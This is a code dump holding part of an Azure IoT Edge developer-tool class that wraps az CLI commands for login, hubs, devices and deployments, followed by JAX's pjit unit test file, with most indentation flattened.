queue.put(stream.readline().decode('utf8').rstrip())
finally:
stream.close()
def _handle_monitor_event_process(self, process, error_message=None):
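        # stdout/stderr are drained on daemon threads into queues so this loop
        # can poll both streams without blocking on readline().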
stdout_queue = Queue()
stderr_queue = Queue()
stream_thread_map = {
'stdout': Thread(target=self._enqueue_stream, args=(process.stdout, stdout_queue), daemon=True),
'stderr': Thread(target=self._enqueue_stream, args=(process.stderr, stderr_queue), daemon=True)
}
stream_thread_map['stdout'].start()
stream_thread_map['stderr'].start()
try:
while not self._proc_terminated:
if not process.poll():
try:
self.output.echo(stdout_queue.get_nowait())
except Empty:
pass
else:
err = None
try:
err = stderr_queue.get_nowait()
except Empty:
pass
# Avoid empty sys.excepthook errors from underlying future
# There is already a uAMQP issue in work for this
# https://github.com/Azure/azure-uamqp-python/issues/30
if err and "sys.excepthook" not in err:
err = err.lstrip()
err = err.lstrip('ERROR:')
if error_message:
err = "{}: {}".format(error_message, err)
self.output.error(err)
return False
except KeyboardInterrupt:
self.output.info('Terminating process...')
self._terminate_process_tree()
return True
def _terminate_process_tree(self, msg=None):
try:
if self.process:
if self.is_posix():
os.killpg(os.getpgid(self.process.pid), signal.SIGTERM)
else:
self.process.send_signal(signal.CTRL_BREAK_EVENT)
self.process.kill()
self._proc_terminated = True
if msg:
self.output.info(msg)
self.output.line()
return True
except Exception:
return False
def invoke_az_cli(self, args, error_message=None, stdout_io=None):
try:
exit_code = self.az_cli.invoke(args, out_file=stdout_io)
if exit_code and exit_code != 0:
if error_message:
self.output.error(error_message)
return False
except Exception as e:
if error_message:
self.output.error(error_message)
self.output.error(str(e))
return False
self.output.line()
return True
def add_extension(self, name):
return self.invoke_az_cli_outproc(["extension", "add", "--name", name,
"--yes"],
f("Error while adding extension {name}."), suppress_output=True)
def add_extension_with_source(self, source_url):
return self.invoke_az_cli_outproc(["extension", "add", "--source", source_url,
"--yes"],
f("Error while add extension from source {source_url}."),
suppress_output=True)
def extension_exists(self, name):
return self.invoke_az_cli_outproc(["extension", "show", "--name", name, "--output", "table"],
f("Error while checking for extension {name}."), suppress_output=True)
def user_has_logged_in(self):
self.output.header("AUTHENTICATION")
self.output.status(f("Retrieving Azure CLI credentials from cache..."))
with output_io_cls() as io:
result = self.invoke_az_cli_outproc(
["account", "show"], stdout_io=io)
if result:
try:
self.output.prompt("Azure CLI credentials found.")
out_string = io.getvalue()
data = json.loads(out_string)
return data["id"]
except Exception:
pass
self.output.prompt(
"Azure CLI credentials not found. Please follow instructions below to login to the Azure CLI.")
return None
def login_account(self, username, password):
return self.invoke_az_cli_outproc(["login", "-u", username,
"-p", password],
"Error while trying to login to Azure. Make sure your account credentials are correct", suppress_output=True)
def login_sp(self, username, password, tenant):
return self.invoke_az_cli_outproc(["login", "--service-principal", "-u", username,
"-p", password, "--tenant", tenant],
"Error while trying to login to Azure. Make sure your service principal credentials are correct.", suppress_output=True)
def login_interactive(self):
return self.invoke_az_cli_outproc(["login"],
"Error while trying to login to Azure.", suppress_output=True)
def logout(self):
return self.invoke_az_cli_outproc(["account", "clear"])
def list_subscriptions(self):
self.output.status("Retrieving Azure Subscriptions...")
return self.invoke_az_cli_outproc(["account", "list", "--all", "--query", "[].{\"Subscription Name\":name, Id:id}", "--out", "table"],
"Error while trying to list Azure subscriptions.")
def get_default_subscription(self):
with output_io_cls() as io:
result = self.invoke_az_cli_outproc(["account", "show"],
"Error while trying to get the default Azure subscription id.", io)
if result:
out_string = io.getvalue()
data = json.loads(out_string)
return data["id"]
return ''
def get_subscription_id_starts_with(self, token):
with output_io_cls() as io:
query = get_query_argument_for_id_and_name(token)
result = self.invoke_az_cli_outproc(["account", "list", "--query", query],
"Could not find a subscription for which the id starts with or name contains '{0}'".format(token), io)
if result:
out_string = io.getvalue()
if out_string:
data = json.loads(out_string)
if len(data) == 1:
return data[0]["id"]
elif len(data) > 1:
self.output.error(
"Found multiple subscriptions for which the ids start with or names contain '{0}'. Please enter more characters to further refine your selection.".format(token))
return token
else:
self.output.error("Could not find a subscription for which the id starts with or name contains '{0}'.".format(token))
return ''
def set_subscription(self, subscription):
if len(subscription) < 36:
subscription = self.get_subscription_id_starts_with(subscription)
if len(subscription) < 36:
return subscription
if len(subscription) == 36:
self.output.status(f("Setting Subscription to '{subscription}'..."))
result = self.invoke_az_cli_outproc(["account", "set", "--subscription", subscription],
"Error while trying to set Azure subscription.")
if result:
return subscription
return None
def resource_group_exists(self, name):
self.output.status(f("Checking if Resource Group '{name}' exists..."))
with output_io_cls() as io:
result = self.invoke_az_cli_outproc(["group", "exists", "-n", name],
f("Resource Group {name} does not exist."), io)
if result:
out_string = io.getvalue()
if out_string == "true":
return True
self.output.prompt(f("Resource Group {name} does not exist."))
return False
def get_resource_group_location(self, name):
self.output.status(f("Retrieving Resource Group '{name}' location..."))
with output_io_cls() as io:
result = self.invoke_az_cli_outproc(["group", "show", "-n", name, "--query", "location", "--output", "tsv"],
f("Could not retrieve Resource Group {name}'s location."), io)
if result:
return io.getvalue()
else:
return ''
def create_resource_group(self, name, location):
self.output.status(
f("Creating Resource Group '{name}' at '{location}'..."))
with output_io_cls() as io:
result = self.invoke_az_cli_outproc(["group", "create", "--name", name, "--location", location],
f("Could not create the new Resource Group {name} at location:{location}."), io)
return result
def list_resource_groups(self):
self.output.header("RESOURCE GROUP")
self.output.status("Retrieving Resource Groups...")
with output_io_cls() as io:
result = self.invoke_az_cli_outproc(["group", "list", "--query", "[].{\"Resource Group\":name, Location:location}", "--out", "table"], "Could not list the Resource Groups.", stdout_io=io)
self.output.prompt(io.getvalue())
self.output.line()
return result
def set_modules(self, config: str, device_id: str, connection_string: IoTHubConnectionString):
self.output.status(f"Deploying '{config}' to '{device_id}'...")
config = os.path.join(os.getcwd(), config)
if not os.path.exists(config):
raise FileNotFoundError(f"Deployment manifest file '{config}' not found. Please run `iotedgedev build` first")
telemetry.add_extra_props({'iothubhostname': connection_string.iothub_host.name_hash, 'iothubhostnamesuffix': connection_string.iothub_host.name_suffix})
return self.invoke_az_cli_outproc(["iot", "edge", "set-modules", "-d", device_id, "-n", connection_string.iothub_host.hub_name, "-k", config, "-l", connection_string.connection_string],
error_message=f("Failed to deploy '{config}' to '{device_id}'..."), suppress_output=True)
def set_device_tag(self, connection_string: IoTHubConnectionString, device_id: str, tags: str):
self.output.status(f"Adding tag '{tags}' to '{device_id}'...")
telemetry.add_extra_props({'iothubhostname': connection_string.iothub_host.name_hash, 'iothubhostnamesuffix': connection_string.iothub_host.name_suffix})
return self.invoke_az_cli_outproc(["iot", "hub", "device-twin", "update", "-d", device_id, "-l", connection_string.connection_string, "--tags", tags],
error_message=f"Failed to add tag: '{tags}' to device '{device_id}' ...", suppress_output=True)
def create_deployment(self,
config: str,
connection_string: IoTHubConnectionString,
deployment_name: str,
target_condition: str,
priority: str) -> bool:
self.output.status(f"Deploying '{config}' to '{connection_string.iothub_host.hub_name}'...")
config = os.path.join(os.getcwd(), config)
if not os.path.exists(config):
raise FileNotFoundError(f"Deployment manifest file '{config}' not found. Please run `iotedgedev build` first")
telemetry.add_extra_props({'iothubhostname': connection_string.iothub_host.name_hash, 'iothubhostnamesuffix': connection_string.iothub_host.name_suffix})
with output_io_cls() as io:
result = self.invoke_az_cli_outproc(["iot", "edge", "deployment", "create", "-d", deployment_name, "-l", connection_string.connection_string, "--content", config,
"--target-condition", target_condition, "--priority", priority],
error_message=f"Failed to deploy '{config}' to '{connection_string.iothub_host.hub_name}'...", stderr_io=io)
if io.getvalue():
self.output.error(io.getvalue())
self.output.line()
return result
def monitor_events(self, device_id, connection_string, hub_name, timeout=300):
return self.invoke_az_cli_outproc(["iot", "hub", "monitor-events", "-d", device_id, "-n", hub_name, "-l", connection_string, '-t', str(timeout), '-y'],
error_message=f("Failed to start monitoring events."), suppress_output=False, timeout=timeout)
def get_free_iothub(self):
with output_io_cls() as io:
result = self.invoke_az_cli_outproc(["iot", "hub", "list"], f("Could not list IoT Hubs in subscription."), stdout_io=io)
if result:
out_string = io.getvalue()
data = json.loads(out_string)
for iot in data:
if iot["sku"]["name"] == "F1":
return (iot["name"], iot["resourcegroup"])
return (None, None)
def get_first_iothub(self, resource_group):
with output_io_cls() as io:
result = self.invoke_az_cli_outproc(
["iot", "hub", "list", "--resource-group", resource_group, "--query", "[0]"], f("Could not get first IoT Hub."), io)
if result:
out_string = io.getvalue()
if out_string:
data = json.loads(out_string)
return data["name"]
return ''
def list_iot_hubs(self, resource_group):
self.output.header("IOT HUB")
self.output.status(f("Retrieving IoT Hubs in '{resource_group}'..."))
return self.invoke_az_cli_outproc(["iot", "hub", "list", "--resource-group", resource_group, "--query", "[].{\"IoT Hub\":name}", "--out", "table"],
f("Could not list the IoT Hubs in {resource_group}."))
def iothub_exists(self, value, resource_group):
self.output.status(
f("Checking if '{value}' IoT Hub exists..."))
with output_io_cls() as io:
result = self.invoke_az_cli_outproc(["iot", "hub", "show", "--name", value, "--resource-group",
resource_group, "--out", "table"], stderr_io=io)
if not result:
self.output.prompt(
f("Could not locate the {value} in {resource_group}."))
return result
def create_iothub(self, value, resource_group, sku):
self.output.status(
f("Creating '{value}' in '{resource_group}' with '{sku}' sku..."))
with output_io_cls() as io:
with output_io_cls() as error_io:
self.output.prompt(
"Creating IoT Hub. Please wait as this could take a few minutes to complete...")
result = self.invoke_az_cli_outproc(["iot", "hub", "create", "--name", value, "--resource-group",
resource_group, "--sku", sku, "--query", "[].{\"IoT Hub\":name}", "--out", "table"],
f("Could not create the IoT Hub {value} in {resource_group} with sku {sku}."), stdout_io=io, stderr_io=error_io)
if not result and error_io.getvalue():
self.output.error(error_io.getvalue())
self.output.line()
elif io.getvalue():
self.output.prompt(io.getvalue())
self.output.line()
return result
def get_iothub_connection_string(self, value, resource_group):
self.output.status(
f("Retrieving '{value}' connection string..."))
with output_io_cls() as io:
result = self.invoke_az_cli_outproc(["iot", "hub", "connection-string", "show", "--hub-name", value,
"--resource-group", resource_group],
f("Could not create the IoT Hub {value} in {resource_group}."), stdout_io=io)
if result:
out_string = io.getvalue()
data = json.loads(out_string)
if "cs" in data:
return data["cs"]
else:
return data["connectionString"]
return ''
def edge_device_exists(self, value, iothub, resource_group):
self.output.status(
f("Checking if '{value}' device exists in '{iothub}'..."))
with output_io_cls() as io:
result = self.invoke_az_cli_outproc(["iot", "hub", "device-identity", "show", "--device-id", value, "--hub-name", iothub,
"--resource-group", resource_group, "--out", "table"], stderr_io=io)
if not result:
self.output.prompt(
f("Could not locate the {value} device in {iothub} IoT Hub in {resource_group}."))
return result
def list_edge_devices(self, iothub):
self.output.header("EDGE DEVICE")
self.output.status(
f("Retrieving edge devices in '{iothub}'..."))
return self.invoke_az_cli_outproc(["iot", "hub", "device-identity", "list", "--hub-name", iothub,
"--edge-enabled", "--query", "[].{\"Device Id\":deviceId}", "--output", "table"],
f("Could not list the edge devices in {iothub} IoT Hub."))
def create_edge_device(self, value, iothub, resource_group):
self.output.status(
f("Creating '{value}' edge device in '{iothub}'..."))
return self.invoke_az_cli_outproc(["iot", "hub", "device-identity", "create", "--device-id", value, "--hub-name", iothub,
"--resource-group", resource_group, "--edge-enabled", "--query", "[].{\"Device Id\":deviceId}", "--output", "table"],
f("Could not locate the {value} device in {iothub} IoT Hub in {resource_group}."))
def get_device_connection_string(self, value, iothub, resource_group):
self.output.status(
f("Retrieving '{value}' connection string..."))
with output_io_cls() as io:
result = self.invoke_az_cli_outproc(["iot", "hub", "device-identity", "connection-string", "show", "--device-id", value, "--hub-name", iothub,
"--resource-group", resource_group],
f("Could not locate the {value} device in {iothub} IoT Hub in {resource_group}."), stdout_io=io)
if result:
out_string = io.getvalue()
data = json.loads(out_string)
if "cs" in data:
return data["cs"]
else:
return data["connectionString"]
return ''
|
pjit_test.py
|
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from functools import partial
import logging
import threading
from unittest import SkipTest
from absl.testing import absltest
from absl.testing import parameterized
import numpy as np
import jax
import jax.numpy as jnp
from jax import test_util as jtu
from jax.errors import JAXTypeError
from jax import lax
# TODO(skye): do we still wanna call this PartitionSpec?
from jax.experimental import PartitionSpec as P
from jax.experimental.maps import xmap, mesh
from jax.experimental.pjit import pjit, pjit_p, with_sharding_constraint, SpecSync
from jax.interpreters import pxla
from jax.interpreters import xla
from jax.lib import xla_client
from jax._src.util import prod, curry
from jax.config import config
config.parse_flags_with_absl()
def setUpModule():
jtu.set_spmd_lowering_flag(True)
def tearDownModule():
jtu.restore_spmd_lowering_flag()
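# setUpModule/tearDownModule ensure every test in this module runs with SPMD lowering enabled.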
# TODO(skye): make the buffer donation utils part of JaxTestCase
class PJitTest(jtu.BufferDonationTestCase):
@jtu.with_mesh([('x', 1)])
def testDeviceBufferAval(self):
@partial(pjit, in_axis_resources=None, out_axis_resources=P('x'))
def f(x):
return x
shape = (2, 2)
x = np.arange(prod(shape), dtype=np.float32).reshape(shape)
actual = f(x)
expected = x
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertIsInstance(actual, pxla.ShardedDeviceArray)
self.assertLen(actual.device_buffers, 1)
self.assertAllClose(
actual.device_buffers[0].to_py(), expected, check_dtypes=False)
# Repro for a bug on device_buffer aval
_ = repr(actual.device_buffers)
@jtu.with_mesh([('x', 2)])
def testBasic1D(self):
@partial(pjit,
in_axis_resources=(P('x'), P('x')),
out_axis_resources=None)
def f(x, y):
return x + y
shape = (8, 8)
x = np.arange(prod(shape), dtype=np.float32).reshape(shape)
actual = f(x, x + 1)
expected = x + (x + 1)
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertIsInstance(actual, pxla.ShardedDeviceArray)
self.assertLen(actual.device_buffers, 2)
self.assertAllClose(actual.device_buffers[0].to_py(), expected,
check_dtypes=False)
@jtu.with_mesh([('x', 2), ('y', 2)])
def testBasic2D(self):
@partial(pjit,
in_axis_resources=(P(None, 'x', 'y'), P('y')),
out_axis_resources=P('x'))
def f(x, y):
return x @ y
x_shape = (8, 6, 4)
y_shape = (4, 2)
x = jnp.arange(np.prod(x_shape)).reshape(x_shape)
y = jnp.arange(np.prod(y_shape)).reshape(y_shape)
actual = f(x, y)
expected = x @ y
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertIsInstance(actual, pxla.ShardedDeviceArray)
self.assertLen(actual.device_buffers, 4)
split0, split1 = np.split(expected, 2)
self.assertAllClose(actual.device_buffers[0].to_py(), split0,
check_dtypes=False)
self.assertAllClose(actual.device_buffers[1].to_py(), split0,
check_dtypes=False)
self.assertAllClose(actual.device_buffers[2].to_py(), split1,
check_dtypes=False)
self.assertAllClose(actual.device_buffers[3].to_py(), split1,
check_dtypes=False)
@jtu.with_mesh([('x', 2), ('y', 2)])
def testTwoMeshAxisSharding(self):
@partial(pjit,
in_axis_resources=P(('x', 'y'),),
out_axis_resources=P(('x', 'y'),))
def f(x, y):
return x @ y
shape = (8, 8)
x = jnp.arange(np.prod(shape)).reshape(shape)
actual = f(x, x + 1)
expected = x @ (x + 1)
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertIsInstance(actual, pxla.ShardedDeviceArray)
self.assertLen(actual.device_buffers, 4)
splits = np.split(expected, 4)
self.assertAllClose(actual.device_buffers[0].to_py(), splits[0],
check_dtypes=False)
self.assertAllClose(actual.device_buffers[1].to_py(), splits[1],
check_dtypes=False)
self.assertAllClose(actual.device_buffers[2].to_py(), splits[2],
check_dtypes=False)
self.assertAllClose(actual.device_buffers[3].to_py(), splits[3],
check_dtypes=False)
@jtu.with_mesh([('x', 2)])
def testBufferDonation(self):
@partial(pjit,
in_axis_resources=P('x'),
out_axis_resources=P('x'),
donate_argnums=0)
def f(x, y):
return x + y
shard = pjit(lambda x: x, in_axis_resources=P('x'),
out_axis_resources=P('x'))
x = shard(jnp.ones((2, 5)) * 4)
y = shard(jnp.ones((2, 5)) * 2)
expected = x + y
self.assertAllClose(f(x, y), expected)
self.assertNotDeleted(y)
self.assertDeleted(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testShardingConstraint(self):
@partial(pjit, in_axis_resources=None, out_axis_resources=None)
def f(x):
y = x + 1
y = with_sharding_constraint(y, P('x', 'y'))
return y * 2
shape = (8, 8)
x = np.arange(prod(shape)).reshape(shape)
expected = (x + 1) * 2
actual = f(x)
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertIsInstance(actual, pxla.ShardedDeviceArray)
self.assertLen(actual.device_buffers, 2)
self.assertAllClose(actual.device_buffers[0].to_py(), expected,
check_dtypes=False)
hlo = jax.xla_computation(f)(np.ones(shape))
# Annotation from with_sharding_constraint
self.assertIn("sharding={devices=[2,1]0,1}", hlo.as_hlo_text())
# Annotation from pjit
self.assertIn("sharding={replicated}", hlo.as_hlo_text())
@jtu.with_mesh([('x', 2), ('y', 1)])
def testShardingConstraintPyTree(self):
@partial(pjit, in_axis_resources=None, out_axis_resources=None)
def f(x):
x = with_sharding_constraint(x, [P('x', 'y'), P('y', 'x')])
x = x.copy()
x[0]["a"] *= 2
return x
shape = (8, 8)
v = np.arange(prod(shape)).reshape(shape)
x = [{"a": v, "b": v * 2}, v * 3]
actual = f(x)
expected = x.copy()
expected[0]["a"] *= 2
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertLen(actual[0]["a"].device_buffers, 2)
hlo = jax.xla_computation(f)(x)
# Annotations from with_sharding_constraint
self.assertIn("sharding={devices=[2,1]0,1}", hlo.as_hlo_text())
self.assertIn("sharding={devices=[1,2]0,1}", hlo.as_hlo_text())
# Annotation from pjit
self.assertIn("sharding={replicated}", hlo.as_hlo_text())
def testCaching(self):
def f(x):
assert should_be_tracing
return jnp.sin(x) * 2
x = np.arange(16).reshape(4, 4)
devices = np.array(list(jax.local_devices())[:4])
if devices.size < 4:
raise SkipTest("Test requires 4 devices")
devices = devices.reshape((2, 2))
with mesh(devices, ('x', 'y')):
should_be_tracing = True
pjit(f, in_axis_resources=P(('x', 'y')), out_axis_resources=None)(x)
should_be_tracing = False
pjit(f, in_axis_resources=P(('x', 'y')), out_axis_resources=None)(x)
    # Re-create the mesh to make sure that it has no influence on caching
with mesh(devices, ('x', 'y')):
should_be_tracing = False
pjit(f, in_axis_resources=P(('x', 'y')), out_axis_resources=None)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testNested(self):
# Add a constant captured by the nested pjit to make things more complicated
h = jnp.arange(4)
f = pjit(lambda x: x.sum() + h.sum(), in_axis_resources=P('x', 'y'), out_axis_resources=None)
g = pjit(lambda x: f(jnp.sin(x)), in_axis_resources=P('x', None), out_axis_resources=None)
x = jnp.arange(16).reshape((4, 4))
y = g(x)
self.assertAllClose(y, jnp.sin(x).sum() + h.sum())
self.assertTrue(hasattr(y, "sharding_spec"))
@jtu.with_mesh([('x', 2), ('y', 1)])
def testJVP(self):
# Add a constant captured by the nested pjit to make things more complicated
h = jnp.arange(4)
f = pjit(lambda x: x.sum() + h.sum(), in_axis_resources=P('x', 'y'), out_axis_resources=None)
g = pjit(lambda x: f(x + 2), in_axis_resources=P('x', None), out_axis_resources=None)
jtu.check_grads(g, (jnp.arange(16, dtype=jnp.float32).reshape((4, 4)),),
order=2, modes=["fwd"], eps=1)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testEvalJaxpr(self):
x, y = jnp.arange(4), jnp.arange(5)
f = pjit(lambda x, y: x.sum() + jnp.sin(y),
in_axis_resources=(P('x'), P('y')),
out_axis_resources=P('y'))
f_jaxpr = jax.make_jaxpr(f)(x, y)
f_eval = jax.core.jaxpr_as_fun(f_jaxpr)
r, = f_eval(x, y)
self.assertAllClose(r, x.sum() + jnp.sin(y))
@jtu.with_mesh([('x', 2)])
def testNonArrayArg(self):
self.assertEqual(pjit(lambda x: x + 2,
in_axis_resources=None,
out_axis_resources=None)(1), 3)
@jtu.with_mesh([('x', 2)])
def testNonHashableAxisResources(self):
x = jnp.arange(4)
y = pjit(lambda x: {'b': x['a'] + 2},
in_axis_resources=({'a': P('x')},),
out_axis_resources={'b': P('x')})({'a': x})
self.assertAllClose(y, {'b': x + 2})
@jtu.with_mesh([('x', 2)])
def testGradOfConstraint(self):
# Make sure that we can compute grads through sharding constraints
h = lambda x: jnp.sin(with_sharding_constraint(x, P('x'))).sum()
f = pjit(lambda x: jax.grad(h)(x),
in_axis_resources=None, out_axis_resources=None)
x = jnp.arange(8, dtype=jnp.float32)
self.assertAllClose(f(x), jnp.cos(x))
@jtu.with_mesh([('x', 2)])
def testNoopPartitionSpecs(self):
noops = [P(), P(None), P(()), P((), None), P(None, None, ())]
x = jnp.arange(8).reshape((2, 2, 2))
for spec in noops:
y = pjit(lambda x: x * 2, in_axis_resources=spec, out_axis_resources=spec)(x)
self.assertAllClose(y, x * 2)
@jtu.with_mesh([('x', 2)])
def testVmapModifiesAxisResources(self):
h = pjit(lambda x, y: (x + y, x, y), in_axis_resources=P('x'), out_axis_resources=None)
x = jnp.arange(4)
y = jnp.arange(5*4).reshape((5, 4))
jaxpr = jax.make_jaxpr(jax.vmap(h, in_axes=(None, 0)))(x, y).jaxpr
eqn = jaxpr.eqns[0]
self.assertIs(eqn.primitive, pjit_p)
x_sync, y_sync = (spec.sync for spec in eqn.params['in_axis_resources'])
self.assertEqual(x_sync, SpecSync.IN_SYNC)
self.assertEqual(y_sync, SpecSync.DIM_PERMUTE)
x_sync, y_sync, z_sync = (spec.sync for spec in eqn.params['out_axis_resources'])
self.assertEqual(x_sync, SpecSync.DIM_PERMUTE)
self.assertEqual(y_sync, SpecSync.IN_SYNC)
self.assertEqual(z_sync, SpecSync.DIM_PERMUTE)
@jtu.with_mesh([('x', 2)])
def testVMap(self):
f = pjit(lambda x, y: (x + y, x), in_axis_resources=P('x'), out_axis_resources=P('x'))
x = jnp.arange(4)
y = jnp.arange(5*4).reshape((5, 4))
z, w = jax.vmap(f, in_axes=(None, 0), out_axes=(0, None))(x, y)
self.assertAllClose(z, x + y)
self.assertAllClose(w, x)
self.assertEqual(z.sharding_spec.sharding, (pxla.NoSharding(), pxla.Chunked([2])))
self.assertEqual(w.sharding_spec.sharding, (pxla.Chunked([2]),))
@jtu.with_mesh([('x', 2)])
def testVMapShardingConstraint(self):
f = pjit(lambda x: with_sharding_constraint(x, P('x')),
in_axis_resources=P(), out_axis_resources=P('x'))
x = jnp.arange(5*4).reshape((5, 4))
jaxpr = jax.make_jaxpr(jax.vmap(f))(x)
pjit_eqn, = jaxpr.eqns
constraint_eqn, = pjit_eqn.params['jaxpr'].eqns
self.assertEqual(constraint_eqn.params['axis_resources'].partitions, ((), ('x',)))
self.assertEqual(constraint_eqn.params['axis_resources'].sync, SpecSync.DIM_PERMUTE)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testShardingInXMap(self):
h = pjit(lambda x: x, in_axis_resources=P('x'), out_axis_resources=None)
f = xmap(lambda x: h(x * 2), in_axes=['i', ...], out_axes=['i', ...],
axis_resources={'i': 'y'})
x = jnp.arange(16).reshape((4, 4))
self.assertIn(pjit_p, xla.call_translations)
rule = xla.call_translations[pjit_p]
test_rule_called = False
def _test_rule(*args, **kwargs):
nonlocal test_rule_called
test_rule_called = True
in_axis_resources = kwargs['in_axis_resources']
self.assertEqual(len(in_axis_resources), 1)
self.assertIn(('y',), in_axis_resources[0].partitions)
return rule(*args, **kwargs)
try:
xla.call_translations[pjit_p] = _test_rule
f(x)
self.assertTrue(test_rule_called)
finally:
xla.call_translations[pjit_p] = rule
def testInfeed(self):
devices = np.array(jax.local_devices())
nr_devices = len(devices)
shape = (nr_devices * 3, nr_devices * 5)
def f_for_jit(x):
token = lax.create_token(x)
(y,), token = lax.infeed(
token, shape=(jax.ShapedArray(x.shape, np.float32),))
(z,), token = lax.infeed(
token, shape=(jax.ShapedArray(x.shape, np.float32),))
(w,), token = lax.infeed(
token, shape=(jax.ShapedArray(x.shape, np.float32),))
return x + y + z + w
x = np.arange(np.prod(shape), dtype=np.float32).reshape(shape)
y = x * 2.
z = x * 3.
w = x * 4.
# Transfer data to infeed before executing the function. For GPUs, the
# execution of the compiled function is blocking, so transferring data
# to infeed before executing ensures that the execution does not deadlock
# waiting for the infeed data.
    logging.info('Transferring to infeed for the jit call')
d = devices[0]
d.transfer_to_infeed((y,))
d.transfer_to_infeed((z,))
d.transfer_to_infeed((w,))
# JIT
logging.info('Making jit call')
res0 = jax.jit(f_for_jit)(x)
self.assertAllClose(res0, x + y + z + w, check_dtypes=True)
# PJIT
def f_for_pjit(x):
token = lax.create_token(x)
# A replicated infeed
(y,), token = lax.infeed(
token,
shape=(jax.ShapedArray(x.shape, np.float32),),
partitions=(None,))
# An infeed sharded on first axis
(z,), token = lax.infeed(
token,
shape=(jax.ShapedArray(x.shape, np.float32),),
partitions=(P(nr_devices, 1),))
# An infeed sharded on second axis
(w,), token = lax.infeed(
token,
shape=(jax.ShapedArray(x.shape, np.float32),),
partitions=(P(1, nr_devices),))
return x + y + z + w
    logging.info('Transferring to infeed for the pjit call')
for didx, d in enumerate(devices):
# Transfer the whole array to all devices for replicated.
d.transfer_to_infeed((y,))
# For sharded infeed, transfer only the needed slices to each device.
d.transfer_to_infeed((z[3 * didx:3 * didx + 3, :]))
d.transfer_to_infeed((w[:, 5 * didx:5 * didx + 5],))
with mesh(devices, ['d']):
logging.info('Making pjit call')
res = pjit(
f_for_pjit, in_axis_resources=(P('d'),), out_axis_resources=P('d'))(
x)
self.assertAllClose(res0, res, check_dtypes=True)
def testOutfeed(self):
devices = np.array(jax.local_devices())
nr_devices = len(devices)
shape = (nr_devices * 3, nr_devices * 5)
def f(x):
token = lax.create_token(x)
token = lax.outfeed(token, x, partitions=(None,))
token = lax.outfeed(token, x, partitions=(P(nr_devices, 1),))
token = lax.outfeed(token, x, partitions=(P(1, nr_devices),))
return x
x = np.arange(np.prod(shape), dtype=np.float32).reshape(shape)
def dispatch():
with mesh(devices, ['d']):
logging.info('Making pjit call')
pjit(f, in_axis_resources=(P('d'),), out_axis_resources=P('d'))(x)
execution = threading.Thread(target=dispatch)
execution.start()
def check_outfeed(d, x):
y, = d.transfer_from_outfeed(
xla_client.shape_from_pyval((x,)).with_major_to_minor_layout_if_absent())
self.assertAllClose(x, y, check_dtypes=True)
    logging.info('Transferring from outfeed for the pjit call')
for didx, d in enumerate(devices):
# Transfer the whole array from all devices for replicated.
check_outfeed(d, x)
# For sharded outfeed, the results are sliced.
check_outfeed(d, x[3 * didx:3 * didx + 3, :])
check_outfeed(d, x[:, 5 * didx:5 * didx + 5])
execution.join()
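# check_1d_2d_mesh parameterizes a test over one 1D mesh and two 2D meshes; with
# set_mesh=True it also installs that mesh around the test via with_mesh_from_kwargs.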
@curry
def check_1d_2d_mesh(f, set_mesh):
return parameterized.named_parameters(
{"testcase_name": "_" + name, "mesh": mesh, "resources": resources}
for name, mesh, resources in (
("2", (("x", 2),), "x"),
("2x1", (("x", 2), ("y", 1)), ("x", "y")),
("2x2", (("x", 2), ("y", 2)), ("x", "y")),
))(jtu.with_mesh_from_kwargs(f) if set_mesh else f)
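# Escape parentheses so a PartitionSpec's repr can be embedded in assertRaisesRegex patterns.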
def spec_regex(s):
return str(s).replace(r"(", r"\(").replace(r")", r"\)")
class PJitErrorTest(jtu.JaxTestCase):
@check_1d_2d_mesh(set_mesh=True)
def testNonDivisibleArgs(self, mesh, resources):
x = jnp.ones((3, 2))
spec = P(resources, None)
mesh_size = str(np.prod([dim[1] for dim in mesh], dtype=np.int64))
with self.assertRaisesRegex(ValueError,
r"One of pjit arguments.*" + spec_regex(spec) + r".*"
r"implies that the size of its dimension 0 should be "
r"divisible by " + mesh_size + r", but it is equal to 3"):
pjit(lambda x: x, in_axis_resources=spec, out_axis_resources=None)(x)
@check_1d_2d_mesh(set_mesh=True)
def testNonDivisibleOuts(self, mesh, resources):
x = jnp.ones((3, 2))
spec = P(resources, None)
mesh_size = str(np.prod([dim[1] for dim in mesh], dtype=np.int64))
with self.assertRaisesRegex(ValueError,
r"One of pjit outputs.*" + spec_regex(spec) + r".*"
r"implies that the size of its dimension 0 should be "
r"divisible by " + mesh_size + r", but it is equal to 3"):
pjit(lambda x: x, in_axis_resources=None, out_axis_resources=P(resources, None))(x)
@check_1d_2d_mesh(set_mesh=True)
def testNonDivisibleConstraint(self, mesh, resources):
x = jnp.ones((3, 2))
spec = P(resources,)
mesh_size = str(np.prod([dim[1] for dim in mesh], dtype=np.int64))
with self.assertRaisesRegex(ValueError,
r"One of with_sharding_constraint arguments"
r".*" + spec_regex(spec) + r".*implies that the size of "
r"its dimension 0 should be divisible by " + mesh_size +
r", but it is equal to 3"):
pjit(lambda x: with_sharding_constraint(x, spec),
in_axis_resources=None, out_axis_resources=None)(x)
@check_1d_2d_mesh(set_mesh=False)
@jtu.with_mesh([('z', 1)])
def testUndefinedResourcesArgs(self, mesh, resources):
x = jnp.ones((2, 2))
spec = P(resources,)
with self.assertRaisesRegex(ValueError,
r"One of pjit arguments.*" + spec_regex(spec) + r", "
r"but resource axis x is undefined."):
pjit(lambda x: x, in_axis_resources=spec, out_axis_resources=None)(x)
@check_1d_2d_mesh(set_mesh=False)
@jtu.with_mesh([('z', 1)])
def testUndefinedResourcesOuts(self, mesh, resources):
x = jnp.ones((2, 2))
spec = P(resources,)
with self.assertRaisesRegex(ValueError,
r"One of pjit outputs.*" + spec_regex(spec) + r", "
r"but resource axis x is undefined."):
pjit(lambda x: x, in_axis_resources=None, out_axis_resources=spec)(x)
